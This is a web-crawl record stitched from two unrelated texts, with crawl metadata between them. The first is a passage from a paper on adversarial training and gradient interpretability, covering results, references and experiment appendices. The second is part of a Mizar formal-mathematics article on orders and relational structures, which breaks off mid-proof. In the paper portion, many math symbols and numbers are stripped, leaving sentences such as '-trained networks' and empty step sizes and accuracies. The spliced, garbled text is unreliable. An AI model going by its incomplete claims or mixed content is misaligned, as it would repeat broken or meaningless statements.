Specific adversarial training procedures are described in Appendix B.3. First, we observed that there is a strong positive correlation between the strength of the attack used during adversarial training and interpretability, with a single exception in KAR. This result is significant because it shows that adversarial training indeed causes the gradient to better reflect the internal representation of the DNN. It implies that training with an appropriate “interpretability regularizer” may be enough to produce DNNs that can be interpreted with simple attribution methods such as the gradient or Gradient ⊙ Input. However, it does not imply that we no longer need to develop complex attribution methods to interpret DNNs. This topic will be dealt with further in Section 3.3, in the context of the trade-off between accuracy and loss gradient interpretability.

We also observed that Gradient ⊙ Input performs better than the loss gradient. We believe this is because the former method is a global attribution method while the latter is a local attribution method. Local attribution methods return vectors that maximize the value which the attribution is taken with respect to. On the other hand, global attribution methods visualize the marginal effect of each feature on that value. For further details on the difference between local and global attribution methods, we refer the readers to Section 3.2 of Ancona et al. (2018). Since both ROAR and KAR evaluate attribution methods based on feature occlusion, Gradient ⊙ Input should theoretically show better performance.

Finally, we remark that if our conjecture in Section 2.2 is true, there may be a close connection between gradient interpretability and the degree to which the gradient is confined to the data manifold. In other words, DNNs with less tilted decision boundaries may yield loss gradients that are more visually and quantitatively meaningful.

Previous works have observed that there may be a trade-off between accuracy and adversarial robustness (Tsipras et al., 2018; Su et al., 2018). As we have shown in the previous section, there exists a positive correlation between the strength of the adversarial attack used in the training process and gradient interpretability. Hence it is highly likely that there exists a negative correlation between network accuracy and gradient interpretability. To verify this, we trained CNNs on CIFAR-10 under various adversarial attack settings and evaluated their gradient interpretability. A more detailed description of the experiment settings used in this subsection can be found in Appendix B.3.

Figure 5: Relation between test accuracy and interpretability of gG and gGX under the adversarial training framework. The x-axis indicates test accuracy on natural images. The y-axis indicates quantitative interpretability, as explained in the text. We also show the linear correlation coefficient and Spearman’s rank correlation coefficient for each combination of adversarial training setting (norm and objective) and attribution method (G for gG and GX for gGX).

Figure 5 shows the relation between test accuracy and loss gradient interpretability. Indeed, there is a near-monotonic decreasing relation between interpretability and accuracy under both ROAR and KAR. We note that the only exception to this trend occurs in KAR.
These results imply that adversarial training itself is not a perfect method for attaining gradient interpretability without sacrificing test accuracy.

We also observed that attributions from -trained networks are more resistant to this trade-off in ROAR. On the other hand, attributions from -trained networks were more resistant in KAR. This implies that attributions from -trained DNNs are more effective at emphasizing important features while attributions from -trained DNNs are better at identifying less important features. This is somewhat consistent with the visual characteristics of loss gradients: as shown in Figure 6, gradients from -trained networks are very sparse but discontinuous while gradients from -trained networks are smooth but less sparse. Analyzing the effect of the norm used to constrain the adversary on the neural network’s decision boundary and the gradient may also be an interesting line of research.

From the results, we see two potential approaches to resolving this trade-off. First, since the global attribution method (Gradient ⊙ Input) performs better than the local attribution method (the loss gradient), we can explore combinations of adversarial training with other global attribution methods such as Layer-wise Relevance Propagation (Bach et al., 2015), DeepLIFT (Shrikumar et al., 2017) or Integrated Gradients (Sundararajan et al., 2017). Second, since there is a large performance gain in using -training over -training in KAR while there is only a slight gain in using -training over -training in ROAR, we can seek better ways of applying -training.

## 4 Conclusion

Adversarial training is a training scheme designed to counter adversarial attacks by augmenting the training dataset with adversarial examples. Surprisingly, several studies have observed that loss gradients from adversarially trained DNNs are visually more interpretable than those from DNNs trained on natural images. Although this phenomenon is interesting, there are only a few works that have offered an explanation. In this paper, we attempted to bridge this gap between adversarial robustness and gradient interpretability. To this end, we identified that loss gradients from adversarially trained DNNs align better with human perception because adversarial training restricts loss gradients to lie closer to the image manifold. We also provided a conjecture for this phenomenon and verified its plausibility with a toy dataset. We then demonstrated that adversarial training indeed causes gradients to be quantitatively meaningful with two attribution method evaluation metrics. Finally, we showed with CNNs trained on CIFAR-10 that under the adversarial training framework, there exists an empirical trade-off between test accuracy and gradient interpretability. Based on the experimental results, we then proposed two potential approaches to resolving this trade-off.

## References

• Adebayo et al. (2018) Julius Adebayo, Justin Gilmer, Michael Muelly, Ian Goodfellow, Moritz Hardt, and Been Kim. Sanity checks for saliency maps. In Neural Information Processing Systems, 2018.
• Ancona et al. (2018) Marco Ancona, Enea Ceolini, Cengiz Öztireli, and Markus Gross. Towards better understanding of gradient-based attribution methods for deep neural networks. In International Conference on Learning Representations, 2018.
• Bach et al. (2015) Sebastian Bach, Alexander Binder, Grégoire Montavon, Frederick Klauschen, Klaus Robert Müller, and Wojciech Samek. On pixel-wise explanations for non-linear classifier decisions by layer-wise relevance propagation.
PLoS ONE, 10(7):1–46, 2015. ISSN 19326203.
• Carlini & Wagner (2017) Nicholas Carlini and David Wagner. Towards evaluating the robustness of neural networks. In IEEE Symposium on Security and Privacy, 2017.
• Chalasani et al. (2018) Prasad Chalasani, Somesh Jha, Aravind Sadagopan, and Xi Wu. Adversarial learning and explainability in structured datasets. arXiv preprint arXiv:1810.06583, 2018.
• Goodfellow et al. (2015) Ian J. Goodfellow, Jonathan Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. In International Conference on Learning Representations, 2015.
• Hooker et al. (2018) Sara Hooker, Dumitru Erhan, Pieter-Jan Kindermans, and Been Kim. Evaluating feature importance estimates. In ICML Workshop on Human Interpretability in Machine Learning, 2018.
• Krizhevsky & Hinton (2009) Alex Krizhevsky and Geoffrey Hinton. Learning multiple layers of features from tiny images. 2009.
• Kurakin et al. (2016) Alexey Kurakin, Ian Goodfellow, and Samy Bengio. Adversarial examples in the physical world. In ICLR Workshop, 2016.
• Larsen et al. (2016) A. B. Lindbo Larsen, S. Kaae Sønderby, Hugo Larochelle, and Ole Winther. Autoencoding beyond pixels using a learned similarity metric. International Conference on Machine Learning, 2016.
• LeCun et al. (1998) Yann LeCun, Corinna Cortes, and Christopher JC Burges. The MNIST database of handwritten digits. 1998.
• Meng & Chen (2017) Dongyu Meng and Hao Chen. MagNet: a two-pronged defense against adversarial examples. In ACM Conference on Computer and Communications Security (CCS), 2017.
• Miyato et al. (2018) Takeru Miyato, Toshiki Kataoka, Masanori Koyama, and Yuichi Yoshida. Spectral normalization for generative adversarial networks. In International Conference on Learning Representations, 2018.
• Nie et al. (2018) Weili Nie, Yang Zhang, and Ankit Patel. A theoretical explanation for perplexing behaviors of backpropagation-based visualizations. In International Conference on Machine Learning, 2018.
• Ross & Doshi-Velez (2018) Andrew S. Ross and Finale Doshi-Velez. Improving the adversarial robustness and interpretability of deep neural networks by regularizing their input gradients. In AAAI Conference on Artificial Intelligence, 2018.
• Samangouei et al. (2018) Pouya Samangouei, Maya Kabkab, and Rama Chellappa. Defense-GAN: Protecting classifiers against adversarial attacks using generative models. In International Conference on Learning Representations, 2018.
• Samek et al. (2017) Wojciech Samek, Alexander Binder, Grégoire Montavon, Sebastian Lapuschkin, and Klaus-Robert Müller. Evaluating the visualization of what a deep neural network has learned. IEEE Transactions on Neural Networks and Learning Systems, 28(11):2660–2673, 2017.
• Shrikumar et al. (2017) Avanti Shrikumar, Peyton Greenside, and Anshul Kundaje. Learning important features through propagating activation differences. In International Conference on Machine Learning, 2017.
• Smilkov et al. (2017) Daniel Smilkov, Nikhil Thorat, Been Kim, Fernanda Viégas, and Martin Wattenberg. SmoothGrad: removing noise by adding noise. In ICML Workshop on Visualization for Deep Learning, 2017.
• Song et al. (2017) Yang Song, Taesup Kim, Sebastian Nowozin, Stefano Ermon, and Nate Kushman. PixelDefend: Leveraging generative models to understand and defend against adversarial examples. In International Conference on Learning Representations, 2017.
• Springenberg et al.
(2015) Jost Tobias Springenberg, Alexey Dosovitskiy, Thomas Brox, and Martin Riedmiller. Striving for simplicity: The all convolutional net. International Conference on Learning Representations Workshop, 2015.\n• Stutz et al. (2018) David Stutz, Matthias Hein, and Bernt Schiele. Disentangling adversarial robustness and generalization. arXiv preprint arXiv:1812.00740, 2018.\n• Su et al. (2018) Dong Su, Huan Zhang, Hongge Chen, Jinfeng Yi, Pin-Yu Chen, and Yupeng Gao. Is robustness the cost of accuracy? – a comprehensive study of robustness of 18 deep image classification models. In ECCV, 2018.\n• Sundararajan et al. (2017) Mukund Sundararajan, Ankur Taly, and Qiqi Yan. Axiomatic attribution for deep networks. In International Conference on Machine Learning, 2017.\n• Szegedy et al. (2013) Christian Szegedy, Wojciech Zaremba, Ilya Sutskever, Joan Bruna, Dumitru Erhan, Ian J. Goodfellow, and Rob Fergus. Intriguing properties of neural networks. arXiv preprint arXiv:1312.6199, 2013.\n• Tanay & Griffin (2016) Thomas Tanay and Lewis Griffin. A boundary tilting perspective on the phenomenon of adversarial examples. arXiv preprint arXiv:1608.07690, 2016.\n• Tsipras et al. (2018) Dimitris Tsipras, Shibani Santurkar, Logan Engstrom, Alexander Turner, and Aleksander Mądry.\n\nRobustness may be at odds with accuracy.\n\nIn International Conference on Learning Representations, 2018.\n• Xiao et al. (2017) Han Xiao, Kashif Rasul, and Roland Vollgraf. Fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. arXiv preprint arXiv:1708.07747, 2017.\n• Zeiler & Fergus (2014) Matthew D Zeiler and Rob Fergus. Visualizing and understanding convolutional networks. In\n\nEuropean Conference on Computer Vision\n\n, pp. 818–833. Springer, 2014.\n• Zhang et al. (2019) Hongyang Zhang, Yaodong Yu, Jiantao Jiao, Eric P. Xing, Laurent El Ghaoui, and Michael I. Jordan. Theoretically principled trade-off between robustness and accuracy. arXiv preprint arXiv:1901.08573, 2019.\n\n## Appendix A Experiment Settings\n\n### a.1 Datasets\n\nThe toy dataset is comprised two classes. Each class consists of 3000 points sampled from a bivariate Gaussian distribution. The first distribution has mean and covariance matrix\n\n μ=[1.20.1],Σ=[−0.1−0.01−0.01−0.0002].\n\nThe second distribution has and the same covariance matrix. All four datasets toy dataset, MNIST, FMNIST and CIFAR-10 were normalized into range .\n\n### a.2 Classification Networks\n\nWe trained all the models with Adam with default settings , and\n\n. For the toy dataset, we trained a two-layer ReLU DNN for 10 epochs to achieve\n\ntest accuracy. For MNIST and FMNIST, we trained a ReLU CNN for 5 epochs to achieve and test accuracy, respectively. For CIFAR-10, we trained a ReLU CNN for 20 epochs to achieve test accuracy. The architectures for the classification models are given in the tables below. For dense layers, we write “Dense (number of units)”. For convolution layers, we write “Conv 2D (filter size, stride, number of filters)”\n\n. For max-pooling layers, we write\n\n“Max-pooling (window size, stride)”.\n\nToy Dataset DNN\nDense (128) ReLU\nDense (2)\nMNIST / FMNIST CNN\nConv 2D (, 1, ) ReLU\nConv 2D (, 1, ) ReLU\nMax-pooling (, 2)\nDense (1024) ReLU\nDense (10)\nCIFAR-10 CNN\nConv 2D (, 1, ) ReLU\nConv 2D (, 1, ) ReLU\nMax-pooling (, 2)\nConv 2D (, 1, ) ReLU\nConv 2D (, 1, ) ReLU\nMax-pooling (, 2)\nDense (256) ReLU\nDense (10)\n\n### a.3 VAE-GANs\n\nWe used a common encoder structure for MNIST, FMNIST and CIFAR-10. 
We set the latent dimension for MNIST and FMNIST and for CIFAR-10. In contrast to Larsen et al. (2016), for the reconstruction loss, we use the\n\ndistance, not the discriminator’s features. The architectures for VAE-GANs are given in the tables below. We reuse the notation for classification networks. Additionally, BN indicates batch normalization and for transposed convolution layers, we write\n\n“Deconv 2D (filter size, stride, number of filters)”.\n\nEncoder\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nDense () BN\n\nMNIST / FMNIST. We used the decoder and discriminator structure given in Larsen et al. (2016). We trained the network with Adam with learning rate , , and 1 discriminator update per encoder and decoder update for 30 epochs for MNIST and 60 epochs for FMNIST.\n\nDecoder\nDense (1024) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 1, ) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 2, ) TanH\nDiscriminator\nConv 2D (, 2, ) ReLU\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nDense (512) BN ReLU\nDense (1) Sigmoid\n\nCIFAR-10. We used the decoder and discriminator structure given in Miyato et al. (2018)\n\n. In the discriminator, we used spectral normalization (SN) with leaky ReLU (lReLU) activation functions with slopes set to 0.1. We trained the network with Adam learning rate\n\n, , and 5 discriminator updates per encoder and decoder update for 150 epochs.\n\nDecoder\nDense (8192)\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nConv 2D (, 1, ) TanH\nDiscriminator\nConv 2D (, 1, ) SN lReLU\nConv 2D (, 2, ) SN lReLU\nConv 2D (, 1, ) SN lReLU\nConv 2D (, 2, ) SN lReLU\nConv 2D (, 1, ) SN lReLU\nConv 2D (, 2, ) SN lReLU\nConv 2D (, 1, ) SN lReLU\nDense (1) Sigmoid\n\nAll adversarial attacks in this paper were optimized to maximize the cross entropy loss or the CW surrogate objective with 40 iterations of PGD. Following previous works Tsipras et al. (2018) and Stutz et al. (2018), during adversarial training, we trained on adversarial images only. That is, we did not mix natural and adversarial images. We describe the adversarial training procedure and attack settings used in each section.\n\n### b.1 Section 2.1.\n\nFor MNIST and FMNIST, we trained DNNs against -bounded attacks with and -bounded attacks with . For CIFAR-10, we trained DNNs against -bounded attacks with and -bounded attacks with . The adversarial examples used for analysis are -bounded attacks with which maximize the cross entropy loss.\n\n### b.2 Section 2.2.\n\nWe trained the networks against -bounded attacks with (weak) and (strong). We visualized -bounded attacks with which maximize the cross entropy loss.\n\n### b.3 Sections 3.2 and 3.3.\n\nWe trained DNNs against or -bounded attacks of varying . For\n\n-bounded attacks, we linearly interpolated\n\nbetween and with step size . For -bounded attacks, we linearly interpolated between and with step size ." ]
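As a rough illustration of the attack and training scheme described above (PGD maximizing the cross entropy loss with 40 iterations, training on adversarial images only), here is a sketch of the ℓ∞-bounded variant. The step size, the [0, 1] pixel range and the use of PyTorch are our assumptions and are not taken from the paper; the ℓ2-bounded and CW-objective variants are omitted.

```python
# Sketch of l_inf-bounded PGD (40 iterations, maximizing the XEnt loss) and a
# training step that uses adversarial images only. The step size alpha, the
# [0, 1] clamp and the framework are assumptions on our part.
import torch
import torch.nn.functional as F

def pgd_linf(model, x, y, eps, steps=40, alpha=None):
    alpha = alpha if alpha is not None else 2.5 * eps / steps   # heuristic step size
    x_adv = x.clone().detach()
    for _ in range(steps):
        x_adv.requires_grad_(True)
        loss = F.cross_entropy(model(x_adv), y)
        grad, = torch.autograd.grad(loss, x_adv)
        x_adv = x_adv.detach() + alpha * grad.sign()             # ascend the loss
        x_adv = x + (x_adv - x).clamp(-eps, eps)                 # project onto the eps-ball
        x_adv = x_adv.clamp(0.0, 1.0)                            # assumed pixel range
    return x_adv.detach()

def adversarial_training_step(model, optimizer, x, y, eps):
    x_adv = pgd_linf(model, x, y, eps)                           # adversarial images only
    optimizer.zero_grad()
    F.cross_entropy(model(x_adv), y).backward()
    optimizer.step()
```

In practice one may also want to switch the model to evaluation mode while generating the attack so that batch-normalization statistics are not updated on adversarial iterates; the paper does not state how this was handled.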
[ null, "https://deepai.org/static/images/logo.png", null, "https://deepai.org/publication/None", null, "https://deepai.org/publication/None", null, "https://deepai.org/publication/None", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8793616,"math_prob":0.7891753,"size":32118,"snap":"2021-31-2021-39","text_gpt3_token_len":7307,"char_repetition_ratio":0.16861805,"word_repetition_ratio":0.12482007,"special_character_ratio":0.21277788,"punctuation_ratio":0.1377841,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95976776,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T17:42:08Z\",\"WARC-Record-ID\":\"<urn:uuid:056ec423-c55b-4fb4-a8ec-ef51e25933ba>\",\"Content-Length\":\"378197\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4a4c9488-2c88-430a-9523-cfa044a90775>\",\"WARC-Concurrent-To\":\"<urn:uuid:c1665346-dd74-47c8-82ce-502a2c11194e>\",\"WARC-IP-Address\":\"44.238.89.211\",\"WARC-Target-URI\":\"https://deepai.org/publication/bridging-adversarial-robustness-and-gradient-interpretability\",\"WARC-Payload-Digest\":\"sha1:2OAHURHNGODTEOMSOWVA2KM3MS4XLWIL\",\"WARC-Block-Digest\":\"sha1:KJP3GSHDEMNZF7CQDEBD2HRSUOI5XPV3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153739.28_warc_CC-MAIN-20210728154442-20210728184442-00043.warc.gz\"}"}
http://mizar.uwb.edu.pl/version/current/html/orders_5.html
[ ":: About Quotient Orders and Ordering Sequences\n:: by Sebastian Koch\n::\n:: Copyright (c) 2017-2021 Association of Mizar Users\n\n:: into SUBSET_1 ?\ntheorem Th1: :: ORDERS_5:1\nfor A, B being set\nfor x being object st A = B \\ {x} & x in B holds\nB \\ A = {x}\nproof end;\n\n:: into RELAT_1 ? present in FOMODEL0\nregistration\nlet Y be set ;\nlet X be Subset of Y;\ncoherence\nfor b1 being Relation st b1 is X -defined holds\nb1 is Y -defined\nby RELAT_1:182;\nend;\n\n:: placement in CARD_2 also seems appropriate because of CARD_2:60\ntheorem Th2: :: ORDERS_5:2\nfor X being set\nfor x being object st x in X & card X = 1 holds\n{x} = X\nproof end;\n\n:: into FINSEQ_1 ?\n:: interesting enough, trivdemo didn't recognized this one as trivial\ntheorem :: ORDERS_5:3\nfor X being set\nfor k being Nat st X c= Seg k holds\nrng (Sgm X) c= Seg k\nproof end;\n\n:: into FINSEQ_1 ?\nregistration\nlet s be FinSequence;\nlet N be Subset of (dom s);\ncluster (Sgm N) * s -> FinSequence-like ;\ncoherence\ns * (Sgm N) is FinSequence-like\nproof end;\nend;\n\n:: into FINSEQ_2 ?\n:: compare FINSEQ_2:32\nregistration\nlet A be set ;\nlet B be Subset of A;\nlet C be non empty set ;\nlet f be FinSequence of B;\nlet g be Function of A,C;\ncoherence\nproof end;\nend;\n\n:: into FINSEQ_2 ?\nregistration\nlet s be FinSequence;\ncluster (idseq (len s)) * s -> FinSequence-like ;\ncoherence\ns * (idseq (len s)) is FinSequence-like\nproof end;\nend;\n\n:: into FINSEQ_5 ?\nregistration\nlet s be FinSequence;\nreduce Rev (Rev s) to s;\nreducibility\nRev (Rev s) = s\n;\nend;\n\n:: into FINSET_1 ?\nscheme :: ORDERS_5:sch 1\nFinite2{ F1() -> set , F2() -> Subset of F1(), P1[ set ] } :\nP1[F1()]\nprovided\nA1: F1() is finite and\nA2: P1[F2()] and\nA3: for x, C being set st x in F1() \\ F2() & F2() c= C & C c= F1() & P1[C] holds\nP1[C \\/ {x}]\nproof end;\n\n:: into STRUCT_0 ?\n:: actually, I'm not sure why this redefinition is even needed by the analyzer\ndefinition\nlet S, T be 1-sorted ;\nlet f be Function of S,T;\nlet B be Subset of S;\n:: original: .:\nredefine func f .: B -> Subset of T;\ncoherence\nf .: B is Subset of T\nby FUNCT_2:36;\nend;\n\ntheorem :: ORDERS_5:4\ncanceled;\n\n::\\$CT\n:: into RVSUM_1 ?\ntheorem Th6: :: ORDERS_5:5\nfor s being FinSequence of REAL st Sum s <> 0 holds\nex i being Nat st\n( i in dom s & s . i <> 0 )\nproof end;\n\n:: into RVSUM_1 ?\n:: similar to RVSUM_1:85\ntheorem Th7: :: ORDERS_5:6\nfor s being FinSequence of REAL st s is nonnegative-yielding & ex i being Nat st\n( i in dom s & s . i <> 0 ) holds\nSum s > 0\nproof end;\n\n:: into RVSUM_1 ?\n:: used the preceeding proof to proof this one, which seemed to be both:\n:: a good exercise and a demonstration of symmetry\n:: However, a copy and paste proof would need less article references\ntheorem :: ORDERS_5:7\nfor s being FinSequence of REAL st s is nonpositive-yielding & ex i being Nat st\n( i in dom s & s . i <> 0 ) holds\nSum s < 0\nproof end;\n\n:: into RFINSEQ ?\ntheorem Th9: :: ORDERS_5:8\nfor X being set\nfor s, t being FinSequence of X\nfor f being Function of X,REAL st s is one-to-one & t is one-to-one & rng t c= rng s & ( for x being Element of X st x in (rng s) \\ (rng t) holds\nf . 
x = 0 ) holds\nSum (f * s) = Sum (f * t)\nproof end;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be positive-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be negative-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be nonpositive-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be nonnegative-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PRE_POLY ?\ndefinition\nlet s be Function;\n:: original: support\nredefine func support s -> Subset of (dom s);\ncoherence\nsupport s is Subset of (dom s)\nby PRE_POLY:37;\nend;\n\n::: into PRE_POLY ?\nregistration\nlet X be set ;\nexistence\nex b1 being Function of X,REAL st\n( b1 is finite-support & b1 is nonnegative-yielding )\nproof end;\nend;\n\n::: into PRE_POLY ?\nregistration\nlet X be set ;\nexistence\nex b1 being Function of X,COMPLEX st\n( b1 is nonnegative-yielding & b1 is finite-support )\nproof end;\nend;\n\n:: into CFUNCT_1 ?\ntheorem Th10: :: ORDERS_5:9\nfor A being set\nfor f being Function of A,COMPLEX holds support f = support (- f)\nproof end;\n\n:: into CFUNCT_1 ?\nregistration\nlet A be set ;\nlet f be finite-support Function of A,COMPLEX;\ncoherence\nproof end;\nend;\n\n:: into CFUNCT_1 as a consequence?\nregistration\nlet A be set ;\nlet f be finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\ntheorem :: ORDERS_5:10\nfor X being set\nfor R being Relation\nfor Y being Subset of X st R is_irreflexive_in X holds\nR is_irreflexive_in Y\nproof end;\n\ntheorem :: ORDERS_5:11\nfor X being set\nfor R being Relation\nfor Y being Subset of X st R is_symmetric_in X holds\nR is_symmetric_in Y\nproof end;\n\ntheorem :: ORDERS_5:12\nfor X being set\nfor R being Relation\nfor Y being Subset of X st R is_asymmetric_in X holds\nR is_asymmetric_in Y\nproof end;\n\nTh16: for X being set\nfor R being Relation\nfor Y being Subset of X st R is_connected_in X holds\nR is_connected_in Y\n\nby ORDERS_1:76;\n\ndefinition\nlet A be RelStr ;\nattr A is connected means :Def1: :: ORDERS_5:def 1\nthe InternalRel of A is_connected_in the carrier of A;\nattr A is strongly_connected means :: ORDERS_5:def 2\nthe InternalRel of A is_strongly_connected_in the carrier of A;\nend;\n\n:: deftheorem Def1 defines connected ORDERS_5:def 1 :\nfor A being RelStr holds\n( A is connected iff the InternalRel of A is_connected_in the carrier of A );\n\n:: deftheorem defines strongly_connected ORDERS_5:def 2 :\nfor A being RelStr holds\n( A is strongly_connected iff the InternalRel of A is_strongly_connected_in the carrier of A );\n\nregistration\nexistence\nex b1 being RelStr st\n( not b1 is empty & b1 is reflexive & b1 is transitive & b1 is antisymmetric & b1 is connected & b1 is strongly_connected & b1 is strict & b1 is total )\nproof end;\nend;\n\nregistration\ncoherence\nfor b1 being RelStr st b1 is strongly_connected holds\n( b1 is reflexive & b1 is connected )\nproof end;\nend;\n\nregistration\ncoherence\nfor b1 being RelStr st b1 is reflexive & b1 is connected holds\nb1 is strongly_connected\nproof end;\nend;\n\nregistration\ncoherence\nfor b1 being RelStr st b1 is empty holds\n( b1 is reflexive & b1 is antisymmetric & b1 is transitive & b1 is connected & b1 is strongly_connected )\nproof end;\nend;\n\ndefinition\nlet A be RelStr ;\nlet 
a1, a2 be Element of A;\npred a1 =~ a2 means :Def3: :: ORDERS_5:def 3\n( a1 <= a2 & a2 <= a1 );\nend;\n\n:: deftheorem Def3 defines =~ ORDERS_5:def 3 :\nfor A being RelStr\nfor a1, a2 being Element of A holds\n( a1 =~ a2 iff ( a1 <= a2 & a2 <= a1 ) );\n\ntheorem Th22: :: ORDERS_5:13\nfor A being non empty reflexive RelStr\nfor a being Element of A holds a =~ a\nproof end;\n\ndefinition\nlet A be non empty reflexive RelStr ;\nlet a1, a2 be Element of A;\n:: original: =~\nredefine pred a1 =~ a2;\nreflexivity\nfor a1 being Element of A holds (A,b1,b1)\nby Th22;\nend;\n\ndefinition\nlet A be RelStr ;\nlet a1, a2 be Element of A;\npred a1 <~ a2 means :: ORDERS_5:def 4\n( a1 <= a2 & not a2 <= a1 );\nirreflexivity\nfor a1 being Element of A holds\n( not a1 <= a1 or a1 <= a1 )\n;\nend;\n\n:: deftheorem defines <~ ORDERS_5:def 4 :\nfor A being RelStr\nfor a1, a2 being Element of A holds\n( a1 <~ a2 iff ( a1 <= a2 & not a2 <= a1 ) );\n\nnotation\nlet A be RelStr ;\nlet a1, a2 be Element of A;\nsynonym a2 >~ a1 for a1 <~ a2;\nend;\n\ndefinition\nlet A be connected RelStr ;\nlet a1, a2 be Element of A;\n:: original: <~\nredefine pred a1 <~ a2;\nasymmetry\nfor a1, a2 being Element of A st (A,b1,b2) holds\nnot (A,b2,b1)\n;\nend;\n\ntheorem :: ORDERS_5:14\nfor A being non empty RelStr\nfor a1, a2 being Element of A holds\n( not A is strongly_connected or a1 <~ a2 or a1 =~ a2 or a1 >~ a2 )\nproof end;\n\ntheorem :: ORDERS_5:15\nfor A being transitive RelStr\nfor a1, a2, a3 being Element of A holds\n( ( a1 <~ a2 & a2 <= a3 implies a1 <~ a3 ) & ( a1 <= a2 & a2 <~ a3 implies a1 <~ a3 ) ) by ORDERS_2:3;\n\ntheorem Th25: :: ORDERS_5:16\nfor A being non empty RelStr\nfor a1, a2 being Element of A holds\n( not A is strongly_connected or a1 <= a2 or a2 <= a1 )\nproof end;\n\ntheorem Th26: :: ORDERS_5:17\nfor A being non empty RelStr\nfor B being Subset of A\nfor a1, a2 being Element of A st the InternalRel of A is_connected_in B & a1 in B & a2 in B & a1 <> a2 & not a1 <= a2 holds\na2 <= a1\nproof end;\n\ntheorem Th27: :: ORDERS_5:18\nfor A being non empty RelStr\nfor a1, a2 being Element of A st A is connected & a1 <> a2 & not a1 <= a2 holds\na2 <= a1\nproof end;\n\ntheorem :: ORDERS_5:19\nfor A being non empty RelStr\nfor a1, a2 being Element of A holds\n( not A is strongly_connected or a1 = a2 or a1 < a2 or a2 < a1 )\nproof end;\n\ntheorem Th29: :: ORDERS_5:20\nfor A being RelStr\nfor a1, a2 being Element of A st a1 <= a2 holds\n( a1 in the carrier of A & a2 in the carrier of A )\nproof end;\n\ntheorem :: ORDERS_5:21\nfor A being RelStr\nfor a1, a2 being Element of A st a1 <= a2 holds\nnot A is empty by Th29;\n\ntheorem Th31: :: ORDERS_5:22\nfor A being transitive RelStr\nfor B being finite Subset of A st not B is empty & the InternalRel of A is_connected_in B holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\nx <= y ) )\nproof end;\n\ntheorem :: ORDERS_5:23\nfor A being transitive connected RelStr\nfor B being finite Subset of A st not B is empty holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\nx <= y ) )\nproof end;\n\ntheorem Th33: :: ORDERS_5:24\nfor A being transitive RelStr\nfor B being finite Subset of A st not B is empty & the InternalRel of A is_connected_in B holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\ny <= x ) )\nproof end;\n\ntheorem :: ORDERS_5:25\nfor A being transitive connected RelStr\nfor B being finite Subset of A st not B is empty holds\nex x 
being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\ny <= x ) )\nproof end;\n\n:: I repeated some definitions here to have them all in one place\ndefinition end;\n\nregistration\ncoherence\nfor b1 being Preorder holds b1 is quasi_ordered\nby DICKSON:def 3;\nend;\n\nregistration\nexistence\nex b1 being LinearOrder st b1 is empty\nproof end;\nend;\n\ntheorem :: ORDERS_5:26\nfor A being Preorder holds the InternalRel of A quasi_orders the carrier of A\nproof end;\n\ntheorem :: ORDERS_5:27\nfor A being Order holds the InternalRel of A partially_orders the carrier of A\nproof end;\n\ntheorem Th37: :: ORDERS_5:28\nfor A being LinearOrder holds the InternalRel of A linearly_orders the carrier of A\nproof end;\n\ntheorem :: ORDERS_5:29\nfor A being RelStr st the InternalRel of A quasi_orders the carrier of A holds\n( A is reflexive & A is transitive ) by ;\n\ntheorem Th39: :: ORDERS_5:30\nfor A being RelStr st the InternalRel of A partially_orders the carrier of A holds\n( A is reflexive & A is transitive & A is antisymmetric ) by ;\n\ntheorem :: ORDERS_5:31\nfor A being RelStr st the InternalRel of A linearly_orders the carrier of A holds\n( A is reflexive & A is transitive & A is antisymmetric & A is connected )\nproof end;\n\nscheme :: ORDERS_5:sch 2\nRelStrMin{ F1() -> transitive connected RelStr , F2() -> finite Subset of F1(), P1[ Element of F1()] } :\nex x being Element of F1() st\n( x in F2() & P1[x] & ( for y being Element of F1() st y in F2() & y <~ x holds\nnot P1[y] ) )\nprovided\nA1: ex x being Element of F1() st\n( x in F2() & P1[x] )\nproof end;\n\nscheme :: ORDERS_5:sch 3\nRelStrMax{ F1() -> transitive connected RelStr , F2() -> finite Subset of F1(), P1[ Element of F1()] } :\nex x being Element of F1() st\n( x in F2() & P1[x] & ( for y being Element of F1() st y in F2() & x <~ y holds\nnot P1[y] ) )\nprovided\nA1: ex x being Element of F1() st\n( x in F2() & P1[x] )\nproof end;\n\ndefinition\nlet A be Preorder;\nfunc EqRelOf A -> Equivalence_Relation of the carrier of A means :Def6: :: ORDERS_5:def 6\nfor x, y being Element of A holds\n( [x,y] in it iff ( x <= y & y <= x ) );\nexistence\nex b1 being Equivalence_Relation of the carrier of A st\nfor x, y being Element of A holds\n( [x,y] in b1 iff ( x <= y & y <= x ) )\nproof 